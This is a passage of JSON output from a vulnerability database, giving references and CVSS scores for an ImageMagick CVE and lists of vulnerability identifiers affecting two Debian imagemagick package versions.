"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730580", "reference_id": "1730580", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730580" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931454", "reference_id": "931454", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=931454" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1036899?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.7.4%2Bdfsg-11%2Bdeb9u8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15mv-khzp-fqfk" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1abc-45xr-5bhb" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-1daq-9kb7-eudz" }, { "vulnerability": "VCID-1e38-tmxy-9kew" }, { "vulnerability": "VCID-1ftp-6fvm-rfez" }, { "vulnerability": "VCID-1gh4-vs86-aufs" }, { "vulnerability": "VCID-1gqw-pheb-hfey" }, { "vulnerability": "VCID-1nrq-kzuy-vyfx" }, { "vulnerability": "VCID-1q1g-ses8-wqae" }, { "vulnerability": "VCID-1q97-afut-4ffy" }, { "vulnerability": "VCID-1x18-b9sa-yygh" }, { "vulnerability": "VCID-1x5f-2jf7-hbb2" }, { "vulnerability": "VCID-25zp-duta-2ffk" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2a2h-yk41-qybt" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2ea6-uaw4-wba9" }, { "vulnerability": "VCID-2fzg-6h13-s7bk" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2ken-ysm1-2ybw" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2pwb-71f5-8ken" }, { "vulnerability": "VCID-2r23-hhkx-9fh6" }, { "vulnerability": "VCID-2wxd-hmac-4fcv" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-38vp-3yf8-aue8" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3dsm-e7ye-wqe1" }, { "vulnerability": "VCID-3fa4-xqhq-2fdq" }, { "vulnerability": "VCID-3fzh-1hk1-3ub1" }, { "vulnerability": "VCID-3pky-3t1q-v3av" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3ubj-wp5c-ruat" }, { "vulnerability": "VCID-3vc6-9vhj-ckb2" }, { "vulnerability": "VCID-3yqe-cntb-t3fb" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-4633-67u6-akg8" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-46gw-xunr-jqbp" }, { "vulnerability": "VCID-477e-a2hz-aqb9" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4dxa-f7vm-7feh" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4kxf-5xrh-uue8" }, { "vulnerability": "VCID-4pzm-24uf-73b6" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-4urn-ywwt-ayeg" }, { "vulnerability": "VCID-5114-9n17-pkd1" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-57gx-fkgs-f7cb" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5fc9-tutn-dubw" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5u53-66es-vkbv" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5y72-4n85-qyeb" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-65b6-jbxy-gudt" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6d5n-tv5h-xkhj" }, { "vulnerability": "VCID-6gh6-3g99-x7hz" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6hay-bjuv-nygd" }, { "vulnerability": "VCID-6jnv-nnkm-v7a3" }, { "vulnerability": "VCID-6kep-3ygd-hkbn" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6wy3-xwez-vfej" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6yn4-p8f4-pbh1" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-73j4-24p8-pbe5" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-78zg-am5w-gugh" }, { "vulnerability": "VCID-79w4-fqmh-j3bk" }, { "vulnerability": "VCID-7dqc-1d5h-uybs" }, { "vulnerability": "VCID-7eeu-wtkq-dyc1" }, { "vulnerability": "VCID-7fw6-fzyj-7qf3" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7jvc-54zg-pbcz" }, { "vulnerability": "VCID-7jx8-htkz-7qd4" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7vrs-x5dn-sbcm" }, { "vulnerability": "VCID-7ynu-qf57-ykba" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-872v-6z75-jucm" }, { "vulnerability": "VCID-8862-dh13-hyga" }, { "vulnerability": "VCID-8an6-y8xy-pyf3" }, { "vulnerability": "VCID-8j37-fwz2-bfea" }, { "vulnerability": "VCID-8jgu-2tx3-gkcb" }, { "vulnerability": "VCID-8n3f-ass1-97gj" }, { "vulnerability": "VCID-8v7y-kcz2-bbb9" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-93a6-7956-v3ar" }, { "vulnerability": "VCID-93em-sxxc-j3ep" }, { "vulnerability": "VCID-99f6-k1y9-x7ba" }, { "vulnerability": "VCID-9akb-t56u-4yhr" }, { "vulnerability": "VCID-9ark-hra3-zyh9" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-9n1x-qw25-mbhf" }, { "vulnerability": "VCID-9pr7-aw96-cqfb" }, { "vulnerability": "VCID-9xbc-3nhd-cygp" }, { "vulnerability": "VCID-9z34-j85g-9kej" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-aycq-4vqg-ubgp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b7dh-gjtk-qfhn" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bf7n-dsx6-rqa2" }, { "vulnerability": "VCID-bge6-p7sc-dqdu" }, { "vulnerability": "VCID-bhkh-rppj-1bb5" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c11x-uq25-17b1" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-chgt-azpf-auba" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-crpp-9mt6-nbb6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-cuyh-2uau-1yad" }, { "vulnerability": "VCID-cwez-6cgj-17gz" }, { "vulnerability": "VCID-cz1h-x2a4-zkhj" }, { "vulnerability": "VCID-d74a-pd2n-6khw" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dge7-469z-u7gq" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dkf5-8kww-mkhn" }, { "vulnerability": "VCID-dkzb-3u3f-yuee" }, { "vulnerability": "VCID-dsee-yrq9-cuca" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-dvvt-ud6y-ffe8" }, { "vulnerability": "VCID-dzxx-5pbd-fqc4" }, { "vulnerability": "VCID-e3av-cqc9-dye1" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb86-ytt7-j3gf" }, { "vulnerability": "VCID-ee5d-s8eb-tbdn" }, { "vulnerability": "VCID-eeah-xwrp-f3b5" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-ekgu-5zg9-2uaa" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-envn-rnvj-4yd2" }, { "vulnerability": "VCID-ep6g-44qy-5qd7" }, { "vulnerability": "VCID-eqr7-q1ga-8kcr" }, { "vulnerability": "VCID-es5w-6nr6-73cn" }, { "vulnerability": "VCID-et5y-g25w-4qay" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-f9z9-h8bt-9bg7" }, { "vulnerability": "VCID-fbta-m4mx-jfap" }, { "vulnerability": "VCID-fd5j-v9vt-5fbu" }, { "vulnerability": "VCID-fds9-yfxw-gqgs" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzct-psgq-8fcb" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g2k2-5sn8-t7dz" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g6mw-mvbu-fbcs" }, { "vulnerability": "VCID-g6sp-5zkq-dkf9" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-gq8m-6nq9-4bcq" }, { "vulnerability": "VCID-gqgz-418x-skd3" }, { "vulnerability": "VCID-gqky-zdxn-e3gd" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h6ps-ukb8-qfa9" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hcjv-e7jt-nbbp" }, { "vulnerability": "VCID-hcxd-bker-sqc1" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hry9-mkha-nfct" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-hzr4-8x4m-87cy" }, { "vulnerability": "VCID-j1jt-g5m8-ffbh" }, { "vulnerability": "VCID-jbhc-41ed-guap" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jcmt-5fes-jug2" }, { "vulnerability": "VCID-je5t-8uuq-ekdk" }, { "vulnerability": "VCID-jjzy-ch18-qkfp" }, { "vulnerability": "VCID-jkdz-rbkr-pygc" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jume-bjh7-f3hr" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-jz9p-mte7-vfb3" }, { "vulnerability": "VCID-k1pr-h6c7-2fgp" }, { "vulnerability": "VCID-k1v6-jp8s-pye7" }, { "vulnerability": "VCID-k7ku-8uya-kbeu" }, { "vulnerability": "VCID-kd82-724m-77h8" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-kq6x-z56m-wqhh" }, { "vulnerability": "VCID-kxus-63yw-sufe" }, { "vulnerability": "VCID-m31q-v2ue-zyh1" }, { "vulnerability": "VCID-m9bk-66wv-vqbk" }, { "vulnerability": "VCID-mcry-3vgm-kyh1" }, { "vulnerability": "VCID-mg1t-vz1h-47b9" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mn7e-8e4j-dqba" }, { "vulnerability": "VCID-mt9h-kjh8-kbdu" }, { "vulnerability": "VCID-mvga-q2ts-mqdh" }, { "vulnerability": "VCID-mwf4-u6v6-zqdu" }, { "vulnerability": "VCID-mws6-wym5-d3f6" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-n59p-w7sh-sbhb" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-ngzz-mwp9-rkdv" }, { "vulnerability": "VCID-nnmr-dnnk-qkc4" }, { "vulnerability": "VCID-nsfn-bhe3-cbd4" }, { "vulnerability": "VCID-nsn7-a7z8-1qcd" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-ny9s-4kcr-tbf4" }, { "vulnerability": "VCID-nzh5-tng5-8qdq" }, { "vulnerability": "VCID-p3p3-suuz-dycr" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p5f8-45e4-ybex" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-paf4-ycea-buae" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-ph82-atva-6kgd" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-pnk5-26uq-w3cu" }, { "vulnerability": "VCID-ps6p-v38m-6qe3" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-pthp-wza7-hkgm" }, { "vulnerability": "VCID-punt-nwt4-uqea" }, { "vulnerability": "VCID-pwhs-ep5j-pqa7" }, { "vulnerability": "VCID-pydk-g827-guc5" }, { "vulnerability": "VCID-q2zg-jh8m-tua2" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qjrj-rdqd-uqdy" }, { "vulnerability": "VCID-qp4x-w3fe-hyer" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rf1t-45cj-mue1" }, { "vulnerability": "VCID-rhpj-r7ym-7kdn" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rwat-s4hf-v7bv" }, { "vulnerability": "VCID-rxgw-h3br-b7dy" }, { "vulnerability": "VCID-rypf-qy6p-3bac" }, { "vulnerability": "VCID-ryu7-2nsu-kqf6" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-rzvc-hba1-zfcy" }, { "vulnerability": "VCID-rzz2-km3v-b3hw" }, { "vulnerability": "VCID-s4cu-swuc-9fh4" }, { "vulnerability": "VCID-s4p8-s262-fqfx" }, { "vulnerability": "VCID-s543-mazj-fqfd" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sat2-d6u2-f3c9" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-sdwh-3s12-17fr" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-szhs-nysy-6bap" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-t4gn-rwz1-ykcf" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-thbh-m54e-z7ca" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tms4-1k6m-cqgd" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tnb2-7mvf-sqdk" }, { "vulnerability": "VCID-tnnn-bg52-93a9" }, { "vulnerability": "VCID-trt9-1y65-53en" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-tv6b-u42h-xkh2" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-tzpa-13fk-7kc9" }, { "vulnerability": "VCID-u23c-4px5-c3g9" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-u9um-rar7-97e8" }, { "vulnerability": "VCID-u9v8-n717-fyag" }, { "vulnerability": "VCID-uatu-64df-b7b8" }, { "vulnerability": "VCID-uayc-3r68-tudp" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-umnw-ksa8-9ua8" }, { "vulnerability": "VCID-upce-8s7m-2kfk" }, { "vulnerability": "VCID-ur14-3rbn-j3ev" }, { "vulnerability": "VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { 